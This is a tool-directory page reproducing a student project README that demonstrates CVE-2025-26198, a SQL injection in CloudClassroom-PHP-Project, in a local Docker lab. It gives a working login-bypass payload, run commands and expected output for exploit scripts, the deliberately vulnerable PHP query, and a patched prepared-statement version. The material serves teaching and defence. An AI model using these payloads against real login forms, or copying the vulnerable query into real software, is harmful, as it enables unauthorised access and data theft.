Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-26198 — Educational reproduction of CVE-2025-26198 SQL injection in CloudClassroom-PHP-Project, demonstrating four exploitation techniques (boolean, union, time-based, file read) with patched version comparison. | Kitploit
Tools/GitHubGitHub/wailyacoubi9/cve-2025-26198
Vulnerability AnalysisWeb Application ExploitationPenetration TestingAuthenticationLearning & EducationDatabase Security
GitHubwailyacoubi9/cve-2025-26198

CVE-2025-26198

Educational reproduction of CVE-2025-26198 SQL injection in CloudClassroom-PHP-Project, demonstrating four exploitation techniques (boolean, union, time-based, file read) with patched version comparison.

View Repository
88 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-26198 - SQL Injection Demonstration

Academic project ENSIMAG - Security 3A
Authors: Wail Yacoubi, Mohammed-Yassine Akhmari
Date: January 2026


Warning

This code is intentionally vulnerable for educational purposes.
Never deploy in production.


Description

Reproduction of CVE-2025-26198: Critical SQL Injection in CloudClassroom-PHP-Project v1.0.

CVE characteristics:

  • Identifier: CVE-2025-26198
  • CVSS Score: 9.8/10 (Critical)
  • Type: SQL Injection (CWE-89)
  • Vulnerable component: loginlinkadmin.php
  • Impact: Authentication bypass + full database extraction

Official reference: https://nvd.nist.gov/vuln/detail/CVE-2025-26198


Objective

Demonstrate 4 SQL Injection exploitation techniques:

  1. Boolean-based - Authentication bypass
  2. Union-based - Data extraction
  3. Time-based Blind - Detection by delay
  4. File Read - System file reading

Installation

Prerequisites

  • Docker and Docker Compose
  • Python 3.x
  • Install requests: pip install requests

Startup

# Clone the repository
git clone <your-repo>
cd CVE-2025-26198

# Launch the infrastructure
docker-compose up -d

# Wait for MySQL to be ready (30 seconds)
sleep 30

# Check containers
docker-compose ps

The application is accessible at http://localhost:8081


Exploitation

Method 1: Manual (browser)

  1. Go to http://localhost:8081

  2. Fill in the form:

    • Username: admin' OR '1'='1'-- -
    • Password: anything
  3. Click Login

Result: Successful admin login without a valid password.

Explanation:

The payload transforms the SQL query:

-- Normal query
SELECT * FROM admin WHERE username='admin' AND password=MD5('test')

-- Query with injection
SELECT * FROM admin WHERE username='admin' OR '1'='1'-- -' AND password=MD5('test')

The OR '1'='1' is always true, and -- - comments out the rest.


Method 2: Python Scripts

Simple script

python exploit_simple.py http://localhost:8081

Expected output:

CVE-2025-26198 - SQL Injection Exploit
==================================================
[*] Target: http://localhost:8081/loginlinkadmin.php
[*] Payload: admin' OR '1'='1'-- -
[+] Exploitation successful
[+] Status Code: 200

Full script (4 techniques)

python exploit.py http://localhost:8081

Expected output:

============================================================
  CVE-2025-26198 - SQL Injection Exploitation
============================================================

Test 1: Boolean-based Authentication Bypass
[+] Authentication bypass SUCCESSFUL
[+] Admin access obtained without valid credentials

Test 2: Union-based Data Extraction
[*] Detecting number of columns...
[+] Number of columns: 5
[+] Database name: cloudclassroom
[+] MySQL user: [email protected]
[+] MySQL version: 5.7.44
[+] Tables: admin,students
[+] Admin data:
    - admin:[email protected]
    - superadmin:[email protected]

Test 3: Time-based Blind SQL Injection
[*] Response time: 3.05 seconds
[+] Time-based injection CONFIRMED

Test 4: File Read via LOAD_FILE()
[+] File read SUCCESSFUL
[+] FILE privilege confirmed

EXPLOITATION SUMMARY
[✓] Boolean-based (Auth Bypass)
[✓] Union-based (Data Extraction)
[✓] Time-based (Blind Detection)
[✓] File Read (LOAD_FILE)

Patched version

Test the secure version with prepared statements:

# Enable the patched version
mv app/loginlinkadmin.php app/loginlinkadmin_VULNERABLE.php
mv app/loginlinkadmin_PATCHED.php app/loginlinkadmin.php
docker-compose restart web
sleep 3

# Retest the exploit
python exploit_simple.py http://localhost:8081

Expected result:

[-] Error: Connection aborted
[-] Exploitation failed

The attack is blocked by input validation and prepared statements.

Restore the vulnerable version:

mv app/loginlinkadmin.php app/loginlinkadmin_PATCHED.php
mv app/loginlinkadmin_VULNERABLE.php app/loginlinkadmin.php
docker-compose restart web

Version comparison

AspectVulnerable VersionPatched Version
SQL queryDirect concatenationPDO prepared statement
Input validationNoneAlphanumeric regex
Output escapingNohtmlspecialchars()
SQL InjectionExploitableBlocked
LogsNoneerror_log()

Vulnerable code:

$sql = "SELECT * FROM admin WHERE username='$input_username' AND password=MD5('$input_password')";
$result = $conn->query($sql);

Secure code:

$stmt = $pdo->prepare("SELECT * FROM admin WHERE username = :username AND password = MD5(:password)");
$stmt->bindParam(':username', $input_username, PDO::PARAM_STR);
$stmt->bindParam(':password', $input_password, PDO::PARAM_STR);
$stmt->execute();

Project structure

CVE-2025-26198/
├── README.md
├── RAPPORT.md
├── docker-compose.yml
├── app/
│   ├── index.html
│   ├── loginlinkadmin.php          # Vulnerable version
│   ├── loginlinkadmin_PATCHED.php  # Secure version
│   └── sql/
│       ├── init.sql
│       └── grant_file.sql
├── exploit.py
├── exploit_simple.py
└── screenshots/

Troubleshooting

Web container does not start

docker-compose logs web
docker-compose down
docker-compose up -d --build

Exploit does not work

# Check MySQL
docker-compose exec db mysql -udbuser -pdbpassword -e "SELECT 1"

# Check web service
curl http://localhost:8081

# Check active version
head -n 2 app/loginlinkadmin.php

Port already in use

Modify docker-compose.yml:

ports:
  - "8082:80"

Documentation

See RAPPORT.md for detailed analysis including:

  • Vulnerability mechanism
  • System architecture
  • Security recommendations
  • Development best practices

References

  • Official CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-26198
  • Original project: https://github.com/mathurvishal/CloudClassroom-PHP-Project
  • OWASP SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
  • PHP PDO: https://www.php.net/manual/en/pdo.prepared-statements.php

Disclaimer

Project developed solely for educational purposes as part of the ENSIMAG cybersecurity course.

Authorized use:

  • Learning and training
  • Tests on authorized environments

Prohibited use:

  • Attacks on real systems
  • Malicious use

Any use outside the academic framework is strictly prohibited and illegal.


Authors
Wail Yacoubi & Mohammed-Yassine Akhmari
ENSIMAG - Class of 2026
Course: Security 3A

Download Tool